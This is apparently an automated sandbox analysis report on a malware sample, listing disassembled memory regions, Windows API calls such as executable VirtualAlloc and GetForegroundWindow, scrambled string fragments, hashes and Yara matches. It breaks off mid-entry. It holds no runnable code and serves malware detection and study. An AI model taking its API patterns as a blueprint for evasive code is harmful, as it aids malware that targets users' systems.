                                                                      • Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_8f0000_E093.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                      • Instruction ID: 871f1ad702813c1d58b0d788e193df3154170197c2f1ac7536c0ed9c79c35ec1
                                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                      • Instruction Fuzzy Hash: 83D0123154512CB7D7002A94DC09BDD7B1CDF05B62F008411FB0DD9081C770994046E5

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 135 40e71a-40e738 CoUninitialize * 2
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID: Uninitialize
                                                                      • String ID:
                                                                      • API String ID: 3861434553-0
                                                                      • Opcode ID: bd4e50c2cf2632c146e6dc99e67d996af78d75fcb2eac0acec7d90a27868b704
                                                                      • Instruction ID: 47d587ad0eb400b5f6ee0cc7c77a8a39c50d7b10eba8d8677ba26603a35f3bb5
                                                                      • Opcode Fuzzy Hash: bd4e50c2cf2632c146e6dc99e67d996af78d75fcb2eac0acec7d90a27868b704
                                                                      • Instruction Fuzzy Hash: 10C04CFDA85141EFD384CF24EC5A4157725AB866873000535F913C2370CA6065818A0C

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 136 43c2c8-43c2d6 137 43c2e0-43c2fd 136->137 137->137 138 43c2ff-43ccb9 GetForegroundWindow call 43e110 137->138 141 43ccbe-43ccdf 138->141
                                                                      APIs
                                                                      • GetForegroundWindow.USER32 ref: 0043CCAF
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID: ForegroundWindow
                                                                      • String ID:
                                                                      • API String ID: 2020703349-0
                                                                      • Opcode ID: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                                                      • Instruction ID: 8fb46afbfb550afb85baefcd5c24b2e1a72551ea741637eac68a3138d718cba2
                                                                      • Opcode Fuzzy Hash: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                                                      • Instruction Fuzzy Hash: 07F04CBAD005408BDB044B75CC821A67BA2DB5F320B18897DD441E3384C63C5807CB5D

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 142 40c550-40c580 CoInitializeEx
                                                                      APIs
                                                                      • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID:
                                                                      • API String ID: 2538663250-0
                                                                      • Opcode ID: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
                                                                      • Instruction ID: e03bcfaf696d6c281ff3d22d3b8d0c31e3889364fa9117d67ae1079de8c3c82d
                                                                      • Opcode Fuzzy Hash: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
                                                                      • Instruction Fuzzy Hash: 43D0A7B557050867D2086B1DDC4BF22772C8B83B66F50423DF2A7C61D1D9506A14CA79

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 143 40c583-40c5b2 CoInitializeSecurity
                                                                      APIs
                                                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C595
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeSecurity
                                                                      • String ID:
                                                                      • API String ID: 640775948-0
                                                                      • Opcode ID: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
                                                                      • Instruction ID: 58e2b5502705141ff0d3aa7c975cc0701997441b8ab7d7d43dac110591522243
                                                                      • Opcode Fuzzy Hash: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
                                                                      • Instruction Fuzzy Hash: F1D0C9B47D83407AF5749B08AC17F143210A702F56F740228B363FE2E0C9E172018A0C

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 145 43aaa0-43aaac 146 43aab3-43aabe call 43d810 RtlFreeHeap 145->146 147 43aac4-43aac5 145->147 146->147
                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(?,00000000,?,0043C1D6,?,0040B2E4,00000000,00000001), ref: 0043AABE
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 3298025750-0
                                                                      • Opcode ID: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
                                                                      • Instruction ID: 16971ee2c2e030bf17817a0d81dc477e65560ccac1e7abaabcdfe7fdc6775186
                                                                      • Opcode Fuzzy Hash: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
                                                                      • Instruction Fuzzy Hash: B2D01231505522EBC6102F25FC06B863A58EF0E761F0748B1B4006B071C765ECA186D8

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 150 43aa80-43aa97 call 43d810 RtlAllocateHeap
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(?,00000000,?,?,0043C1C0), ref: 0043AA90
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
                                                                      • Instruction ID: 72b53a506d10aa35cab301047588232e26feb19e762ad2a100d4e8a4b6eb39e1
                                                                      • Opcode Fuzzy Hash: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
                                                                      • Instruction Fuzzy Hash: D6C09231445220BBCA143B16FC09FCA3F68EF4D762F0244A6F514670B2CB61BCA2CAD8
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00999DBE
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2679002116.0000000000999000.00000040.00000020.00020000.00000000.sdmp, Offset: 00999000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_999000_E093.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                      • Instruction ID: 98146a1687e48058e6ba25a724abc4e28a888344a5a4da2dba8ffff320633342
                                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                      • Instruction Fuzzy Hash: 47113979A00208EFDB01DF98C985E98BBF5EF09351F0580A4F9489B362D771EA90DF80
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !$*W.Y$+K!M$;[0]$>C7E$FOEH$NO$U'g)$UGBY$bweM$g#X%$l+X-$w?n!${7y9$$&$EG
                                                                      • API String ID: 0-3492884535
                                                                      • Opcode ID: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                                                      • Instruction ID: ba39798a3fcb6da663dd5afd8d89a9a5fc3f4f782173f0556435d4ff5b4d5338
                                                                      • Opcode Fuzzy Hash: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                                                      • Instruction Fuzzy Hash: A3E10EB4608350CFD7249F25E85176FBBF2FB86304F45896DE5D88B252D7388906CB4A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: /G$I$7N1@$A[$Fg)i$OU$WE${\}
                                                                      • API String ID: 0-1763234448
                                                                      • Opcode ID: 9a3fdac08369869b3e4b907af5614077a7e06872068b7e02554c3d5f210a0157
                                                                      • Instruction ID: 056ee81575811c50f3dd50ebd9ce003cf240713406730f881528123b83eb6744
                                                                      • Opcode Fuzzy Hash: 9a3fdac08369869b3e4b907af5614077a7e06872068b7e02554c3d5f210a0157
                                                                      • Instruction Fuzzy Hash: 2AF1CAB56083509FD3108F65E88276BBBF2FBD2345F54892DF0858B390D7B88906CB86
                                                                      APIs
                                                                        • Part of subcall function 0043C1F0: LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
                                                                      • FreeLibrary.KERNEL32(?), ref: 0041A6BD
                                                                      • FreeLibrary.KERNEL32(?), ref: 0041A77B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary$InitializeThunk
                                                                      • String ID: / $/,-$v$46
                                                                      • API String ID: 764372645-907114598
                                                                      • Opcode ID: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
                                                                      • Instruction ID: fba97bcbe2fd55ed4e85c885b06b17ae8f82464d9f69d288493d133838553020
                                                                      • Opcode Fuzzy Hash: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
                                                                      • Instruction Fuzzy Hash: 9EB247766493009FE3208BA5D8847ABBBD2EBC5310F18D42EE9D497311D7789C858B9B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0u4w$KT$Q$SV$_q$p8`;$qr$xy
                                                                      • API String ID: 0-1826372655
                                                                      • Opcode ID: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
                                                                      • Instruction ID: 8fe2ea29b4499c84cffcf606e05d59b8c59937f8b413fb95e2f4cb334fca5623
                                                                      • Opcode Fuzzy Hash: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
                                                                      • Instruction Fuzzy Hash: C92212B690C3109BD304DF59D8816ABB7E2EFD5314F09892DE8C98B351E739C905CB8A
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_8f0000_E093.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID: / $/,-$46
                                                                      • API String ID: 3664257935-479303636
                                                                      • Opcode ID: 372519780fc120e8f753ff3a14c90593fc4e495d40ae975e42710550ded1acc0
                                                                      • Instruction ID: 019e96b3673d02bc66d71effbc6e6ca27112f7c427e1792c78892407db914dfe
                                                                      • Opcode Fuzzy Hash: 372519780fc120e8f753ff3a14c90593fc4e495d40ae975e42710550ded1acc0
                                                                      • Instruction Fuzzy Hash: 31B255766483409FE3208B95D884B6FBBE3ABD5300F1CC82DE9D49B295D7759C458B83
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8MNO$<I2K$NDNK$RXA$X$oA&C$~
                                                                      • API String ID: 0-3328159043
                                                                      • Opcode ID: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
                                                                      • Instruction ID: b39a018424f603aff0b8ca9a117b68807cb953dc34c5f22e55a732b949ac1150
                                                                      • Opcode Fuzzy Hash: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
                                                                      • Instruction Fuzzy Hash: 90F125B6608740CFC720CF29D8817EBB7E1AFD5314F194A2EE4D997251EB389845CB86
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
                                                                      • API String ID: 0-2309992716
                                                                      • Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                      • Instruction ID: 26eceaee55227743b306782b87e7b3b011f3ad886b5b359efa5fd428808e0ec2
                                                                      • Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                      • Instruction Fuzzy Hash: F661F37164D3C68AD3118F3988A076BFFE09FA3310F18497EE4D05B382D7798A09975A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_8f0000_E093.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
                                                                      • API String ID: 0-2309992716
                                                                      • Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                      • Instruction ID: 1a5a4e08f33129ed8386ce6e44e75970cd92cf0d137338e8c8f1b6a58c786ee0
                                                                      • Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                      • Instruction Fuzzy Hash: C661076154C3C68AD3118F39889077AFFE0EFA2314F18596DE5D18B392D379C6099716
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #4<7$+8=>$PK$Tiec$\$r
                                                                      • API String ID: 0-1906979145
                                                                      • Opcode ID: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
                                                                      • Instruction ID: 6053270823643479f5a9008bd7dab94ee1cb24749ea6a1c2bb59c6b2eb0b3cac
                                                                      • Opcode Fuzzy Hash: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
                                                                      • Instruction Fuzzy Hash: 29D12476A087409BD318CF35C85166BBBE2EBD1318F18893DE5E69B391D738C905CB46
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_8f0000_E093.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #4<7$+8=>$PK$Tiec$\$r
                                                                      • API String ID: 0-1906979145
                                                                      • Opcode ID: eb9bb64c8f79c1854ab48af47ab7cc54b735788ac4fdc3cb149e9e4095002922
                                                                      • Instruction ID: 26f7b76e6629fd126f10f5b09b7d76e85e661fc8a6f3141cd67e0dc4f69b0014
                                                                      • Opcode Fuzzy Hash: eb9bb64c8f79c1854ab48af47ab7cc54b735788ac4fdc3cb149e9e4095002922
                                                                      • Instruction Fuzzy Hash: 71D12276A083448BD718CF35C8916ABBBE2EFD1318F18892DE5E6DB251D738C905CB46
                                                                      APIs
                                                                      • GetCurrentProcessId.KERNEL32 ref: 008F8B83
                                                                      • GetCurrentThreadId.KERNEL32 ref: 008F8B8C
                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 008F8C42
                                                                      • GetForegroundWindow.USER32 ref: 008F8C9A
                                                                        • Part of subcall function 008FC7B7: CoInitializeEx.COMBASE(00000000,00000002), ref: 008FC7CA
                                                                        • Part of subcall function 008FB5F7: FreeLibrary.KERNEL32(008F8D1F), ref: 008FB5FD
                                                                        • Part of subcall function 008FB5F7: FreeLibrary.KERNEL32 ref: 008FB61E
                                                                      • ExitProcess.KERNEL32 ref: 008F8D38
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_8f0000_E093.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                      • String ID:
                                                                      • API String ID: 3072701918-0
                                                                      • Opcode ID: a98a3e3c2a5f1b0f673359f816fa1806a79807cb3814a0bc3f2413038ab882b7
                                                                      • Instruction ID: 70b27bfda2660bcba3cde8d69f292e2291d8b11ce88bc01c55200924f75332d2
                                                                      • Opcode Fuzzy Hash: a98a3e3c2a5f1b0f673359f816fa1806a79807cb3814a0bc3f2413038ab882b7
                                                                      • Instruction Fuzzy Hash: B15197BBF102180BD72CAEB9CC5A7A975879BC5710F1E823D5A45DB3D5EDB88C0182C5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "$-+$/$hI
                                                                      • API String ID: 0-2772680581
                                                                      • Opcode ID: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
                                                                      • Instruction ID: 80b5f3405da4d7e7bc2228bbbe7299cc3933a4313a4431d55bf3dd64750ae482
                                                                      • Opcode Fuzzy Hash: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
                                                                      • Instruction Fuzzy Hash: 6442387850C3818FC725CF25C8506AFBBE1AF85314F044A6EE8D85B392D739D94ACB5A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_8f0000_E093.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "$-+$/$hI
                                                                      • API String ID: 0-2772680581
                                                                      • Opcode ID: baaf34aebe6e111159d882b3926c0eef9b01d4c2baae1dbce7045adb7806651d
                                                                      • Instruction ID: cdc1261ca99123335ee7c1f5ecfdbc5138d8691568be98d1c0d5c61a27d4aacc
                                                                      • Opcode Fuzzy Hash: baaf34aebe6e111159d882b3926c0eef9b01d4c2baae1dbce7045adb7806651d
                                                                      • Instruction Fuzzy Hash: 7542387150C3918FD721CF24C850A6EBBE1AF91314F188A6DE8E59B3D2D736DA05CB52
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_8f0000_E093.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0u4w$_q$qr$xy
                                                                      • API String ID: 0-1225007230
                                                                      • Opcode ID: 0bc8e236467d41b4c844bc6f0c0f01b646d1471f34f8a440b90695bf15ccba6a
                                                                      • Instruction ID: 8c50e120634c883145689e07a06161c33d5ad2ced0793024ded2b3952e993d00
                                                                      • Opcode Fuzzy Hash: 0bc8e236467d41b4c844bc6f0c0f01b646d1471f34f8a440b90695bf15ccba6a
                                                                      • Instruction Fuzzy Hash: A991F2B1A093118BC714CF98C89276BB7F1EF95324F18992CE8CA8B3D5E3749905C756
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,JHj$Hs$bc$v
                                                                      • API String ID: 0-909542228
                                                                      • Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                                      • Instruction ID: f210d87f6d5865ed1c617f00c3be5d3d578c02e4f21426ae5baa12ce733d6edf
                                                                      • Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                                      • Instruction Fuzzy Hash: C0919E71A1C3A08BE3358F3594517AFBBD2AFD3314F58896EC4C99B382C6794405CB96
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_8f0000_E093.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,JHj$Hs$bc$v
                                                                      • API String ID: 0-909542228
                                                                      • Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                                      • Instruction ID: 5b55be5319e10e87226b8f200840789499a370fbd82a00e85269f7de6df22e83
                                                                      • Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                                      • Instruction Fuzzy Hash: 11917A71A0C3D08BE3358B3984517EBBBD29FE3314F19896DD4DA9B382CA754845CB92
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,JHj$Hs$bc$v
                                                                      • API String ID: 0-909542228
                                                                      • Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                      • Instruction ID: ba8baf3debfb1281f5f3a9f4bb7f36b3e217b7d4f704efc08a24ef2861aa601e
                                                                      • Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                      • Instruction Fuzzy Hash: FA916D71A1C3A08BE3358F3594917AFBBD2AFD3314F58896DC4C94B382CA794405CB96
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_8f0000_E093.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,JHj$Hs$bc$v
                                                                      • API String ID: 0-909542228
                                                                      • Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                      • Instruction ID: 60fe98f5897d303c7bf1a44f07d280585563916e0bc516d3dde370b12841d9ef
                                                                      • Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                      • Instruction Fuzzy Hash: 0A917B71A0C3D08BE3348B3584517EBBBD29FE3314F18896DC4D99B782CA754845CB92
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,JHj$Hs$bc$v
                                                                      • API String ID: 0-909542228
                                                                      • Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                      • Instruction ID: f1dd0e060a49988aa5914a4bcfde423beaa814ce8563699fb3410ac54fff71cf
                                                                      • Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                      • Instruction Fuzzy Hash: 89918E71A1C3A08BE3358F3594517ABBFD2AFD3314F58896EC4C99B382C6794405CB96
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_8f0000_E093.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
